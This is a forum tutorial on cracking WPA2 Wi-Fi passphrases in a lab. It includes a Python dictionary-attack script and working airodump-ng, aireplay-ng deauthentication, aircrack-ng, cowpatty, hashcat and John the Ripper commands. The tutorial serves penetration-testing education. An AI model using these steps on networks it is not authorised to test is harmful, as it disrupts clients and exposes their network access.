Wireless Penetration Testing: Password Cracking | General Hacking | Crax

Wireless Penetration Testing: Password Cracking

Jun 22, 2023
Let’s first set the passphrase on our access point. Let’s say the SSID is raaj and the passphrase is raj12345.


We are good to go now, and since the passphrase has changed you obviously aren’t connected to the access point any more. Before going any further, a little theory. In the previous article we covered monitor mode and the wlan interface. Let’s begin by putting our Wi-Fi adapter into monitor mode.

Assuming the Wi-Fi interface is wlan0, the command is:

airmon-ng start wlan0

airmon-ng is part of the aircrack-ng suite, which is preinstalled in Kali Linux. If NetworkManager or wpa_supplicant keep grabbing the card, run airmon-ng check kill first (it stops those services, so restart them when you are done). If you check your interfaces with the iwconfig command now you’d see wlan0 has been turned into wlan0mon. Good for us. Whatever interface name airmon-ng reports is the one to use in every command below. Now we scan for access points around us, looking for our target (SSID raaj):

airodump-ng wlan0mon

This starts scanning and lists every access point’s BSSID (basic service set identifier, simply the access point’s 48-bit MAC address) and ESSID (the SSID name), along with its channel and encryption. We see raaj in there too.


Now let us understand this screen. On the top left you see CH 3. That is the Wi-Fi channel airodump-ng is listening on at this moment; by default it hops through all channels, so you will see that number change.

Definition: In layman’s terms, a Wi-Fi channel is a slice of radio spectrum (a centre frequency plus a width) on which frames travel between your device and the access point.

The 2.4 GHz band defines 14 channels of 20 MHz, spaced only 5 MHz apart (11 are allowed in the US, 13 in most of Europe), so neighbouring channels overlap and only 1, 6 and 11 are fully separated. The 5 GHz band has many more non-overlapping channels; the exact count depends on the regulatory domain, and channels can be bonded into 40, 80 or 160 MHz widths. An access point is configured, manually or automatically, to transmit on one channel. A Wi-Fi adapter, just like your FM receiver, can tune to any channel, but only one at a time.

Analogy: Just like radio stations, an adapter tuned to channel 3 (centre 2422 MHz) won’t hear what’s happening on channel 6 (centre 2437 MHz) until you retune it. airodump-ng hops channels automatically while scanning, which is fine for discovery but means it can miss frames on any one channel; to capture a handshake we lock it to the target’s channel, as shown later in this article.

Now that I have the target, I will capture a handshake.

Handshake: The WPA/WPA2 4-way handshake is the exchange in which an access point and a client prove to each other that they hold the same pairwise master key (PMK) and derive the session keys. The PMK, which is derived from the passphrase and the SSID with PBKDF2, is never transmitted; if it were, that would be a major vulnerability. What does go over the air is two random nonces (ANonce from the access point, SNonce from the client) and, on messages 2, 3 and 4, a message integrity check (MIC): a keyed MAC over the EAPOL frame computed with the key confirmation key (KCK), which is derived from the PMK, both MAC addresses and both nonces. So a capture hands you everything that went into the MIC except the passphrase.

Goal: Our goal is to capture this handshake (a .cap file), extract those fields and run a dictionary attack against the MIC: for each candidate passphrase, derive the PMK, expand it to the PTK, recompute the MIC and compare it with the captured one. A match confirms the passphrase. The MIC is the Wi-Fi analogue of a password hash, and because PBKDF2 runs 4096 iterations of HMAC-SHA1 per candidate, it is a slow one, which is why a good dictionary matters more than raw speed.
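What aircrack-ng, cowpatty, hashcat and john all do with that capture, as an added Python example that is not part of the original post or of any of those tools: derive the PMK from the passphrase and SSID with PBKDF2, expand it to the PTK with the two MAC addresses and nonces, recompute the MIC over message 2 with the KCK, and compare. The BSSID is the one from this article; the client MAC, nonces, RSN IE and the EAPOL message 2 frame are constructed so that the script runs offline. Only the WPA2/CCMP (key descriptor version 2, HMAC-SHA1) and WPA/TKIP (version 1, HMAC-MD5) MIC variants are handled.

```python
"""WPA/WPA2-PSK 4-way handshake MIC check: the core of a dictionary attack.
Added example; MACs, nonces and the EAPOL frame below are constructed."""
import hashlib
import hmac

# Constructed handshake parameters (not from a real capture). The BSSID is the
# one used in the article; the client MAC and both nonces are made up.
SSID = b"raaj"
AP_MAC = bytes.fromhex("18459369a519")
STA_MAC = bytes.fromhex("0011223344aa")
ANONCE = bytes(range(32))            # access point's nonce (sent in message 1)
SNONCE = bytes(range(32, 64))        # client's nonce (sent in message 2)
# Typical WPA2 RSN IE (CCMP pairwise, CCMP group, PSK AKM), carried in message 2.
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")


def derive_pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):  # four 20-byte SHA-1 outputs give 80 bytes; keep the first 64
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def build_eapol_m2(snonce: bytes, key_data: bytes, mic: bytes = bytes(16)) -> bytes:
    """Minimal EAPOL-Key message 2 (RSN descriptor, CCMP, key info 0x010a)."""
    body = (b"\x02"                      # descriptor type: RSN (WPA2)
            + b"\x01\x0a"                # key info: pairwise | MIC | version 2 (HMAC-SHA1)
            + b"\x00\x10"                # key length: 16 (CCMP)
            + (1).to_bytes(8, "big")     # replay counter
            + snonce                     # key nonce field
            + bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, key ID (unused in M2)
            + mic                        # 16-byte MIC field, offset 81 in the full frame
            + len(key_data).to_bytes(2, "big")
            + key_data)
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def compute_mic(passphrase: bytes, ssid: bytes, aa: bytes, spa: bytes,
                anonce: bytes, snonce: bytes, eapol: bytes) -> bytes:
    """MIC = HMAC(KCK, EAPOL frame with the MIC field zeroed); KCK = PTK[0:16]."""
    kck = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    zeroed = eapol[:81] + bytes(16) + eapol[97:]
    version = int.from_bytes(eapol[5:7], "big") & 0x07
    if version == 1:                     # WPA/TKIP: HMAC-MD5, 16 bytes
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:                     # WPA2/CCMP: HMAC-SHA1 truncated to 128 bits
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]
    raise ValueError("unsupported key descriptor version %d" % version)


def crack(ssid, aa, spa, anonce, snonce, eapol, wordlist):
    """Dictionary attack: re-derive the MIC for each candidate and compare."""
    target = eapol[81:97]
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:     # WPA passphrases are 8..63 characters
            continue
        if hmac.compare_digest(compute_mic(cand.encode(), ssid, aa, spa,
                                           anonce, snonce, eapol), target):
            return cand
    return None


def make_capture(passphrase: bytes) -> bytes:
    """Stand-in for what airodump-ng records: message 2 carrying a valid MIC."""
    unsigned = build_eapol_m2(SNONCE, RSN_IE)
    mic = compute_mic(passphrase, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, unsigned)
    return build_eapol_m2(SNONCE, RSN_IE, mic)


if __name__ == "__main__":
    capture = make_capture(b"raj12345")
    words = ["password", "raaj1234", "raj12345", "letmein123"]  # constructed dict.txt
    print("recovered passphrase:",
          crack(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, capture, words))
```

Every candidate costs a full PBKDF2 run (4096 HMAC-SHA1 rounds), which is what makes GPU crackers like hashcat attractive; the MIC comparison itself is cheap. Note that the SSID goes into the PMK, so the same passphrase on two networks yields two different MICs, which is why cowpatty needs -s and why rainbow tables for WPA are only ever per-SSID.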

Since the handshake happens on the access point’s channel, we lock our adapter to that same channel to capture it. But the handshake only occurs when a client authenticates, so we either wait for a client to connect on its own or deauthenticate an already connected client and force it to reconnect (yes, that is possible, and we do it below).

We saw in the above screenshot that “raaj” operates on channel 3 with a given BSSID. Let’s use airodump-ng to capture the handshake:

airodump-ng wlan0mon -c 3 --bssid 18:45:93:69:A5:19 -w pwd

-c : lock the adapter to this channel (no more hopping)

--bssid : only record frames to and from this access point

-w : prefix for the output files; airodump-ng appends a counter, so the capture lands in pwd-01.cap

Once a complete handshake has been seen, airodump-ng prints “WPA handshake: 18:45:93:69:A5:19” in the top right corner of its screen. Until that appears there is nothing to crack.


Now, while airodump-ng waits for a handshake, we can’t just sit quietly. We have to force a connected client to reauthenticate by deauthenticating it. aireplay-ng does this by sending forged deauthentication frames that appear to come from the access point:

aireplay-ng --deauth 0 -a 18:45:93:69:A5:19 wlan0mon

--deauth 0 means keep sending deauth bursts until you stop it with Ctrl-C; a small count such as --deauth 5 is usually enough and far less noisy. Without -c <client MAC> the deauth is broadcast to every client; some clients ignore broadcast deauths, so targeting a station listed by airodump-ng with -c is more reliable. Clients using 802.11w protected management frames ignore forged deauths altogether, in which case you have to wait for a natural reconnect.


And it seems to have worked like magic: as you can see, the client has reauthenticated and we have a handshake! The file is saved as pwd-01.cap.



For simplicity, I’ll rename it to “handshake.cap” and run aircrack-ng against it with a dictionary. In a real engagement that would be a very long list of millions of common passwords plus candidates built from what I know about the target; let’s call it dict.txt. Since we already know the passphrase and only want to demonstrate the attack, the dictionary here holds just 5-10 entries, raj12345 among them.

So, the command is:

aircrack-ng handshake.cap -w dict.txt


As evident below, we have the password thanks to aircrack.



The same can be done with another well-known tool, cowpatty. During my testing, “handshake.cap” got renamed to “wifi.cap”, so don’t get confused.

cowpatty -r wifi.cap -f dict.txt -s raaj

-r : capture file

-f : dictionary file

-s : SSID. This is required because the SSID is the salt in the PBKDF2 derivation of the PMK; with the wrong SSID every candidate fails even if the passphrase is in the list.

It worked like a charm!



For the next method we need hashcat, the undisputed go-to tool for hash cracking, together with the hashcat-utils package. In Kali Linux both are preinstalled. We use the cap2hccapx utility for this method.

hccapx: a custom binary format developed for hashcat that packs the fields needed from a WPA/WPA2 handshake (both MACs, both nonces, the EAPOL frame and the MIC) into one record.

cap2hccapx converts the .cap file to .hccapx, and hashcat can then run a dictionary attack against it.

We can do this by:

cd /usr/share/hashcat-utils
./cap2hccapx.bin /root/wifi.cap /root/wifi.hccapx

Caveat: hashcat 6.0 and later deprecates the hccapx format and hash mode 2500 in favour of hash mode 22000 and the hc22000 text format, which hcxpcapngtool (used in the John the Ripper section below) writes with its -o option. If your hashcat refuses mode 2500, convert the capture that way and use -m 22000 instead.


It is done. We now need to run hashcat against this file:

hashcat -m 2500 wifi.hccapx dict.txt
hashcat -m 2500 wifi.hccapx --show

-m : hash type. 2500 = WPA/WPA2 handshake (EAPOL)

The first command runs the dictionary attack and stores any cracked result in hashcat’s potfile. --show does not crack anything; it only prints what the potfile already holds for the hashes in the file, so it has to be a second, separate run.


Quite simple.

John The Ripper

The same can be done with John the Ripper. We just need to convert the capture into a hash format john understands, using hcxpcapngtool from the hcxtools package:

hcxpcapngtool --john hash.john wifi.cap


Worth a look here is hcxpcapngtool’s summary of the capture file: it reports how many EAPOL frames, handshake pairs and PMKIDs it found, which tells you whether the capture is crackable at all before you spend time on it. Let’s use john to crack the hash now:

john --format=wpapsk --wordlist=dict.txt hash.john
john --show hash.john

Note the = after --wordlist: without it john falls back to its default wordlist and treats dict.txt as another hash file. The first command does the cracking; --show prints the cracked passphrase from john’s pot file afterwards.


Thanks for reading.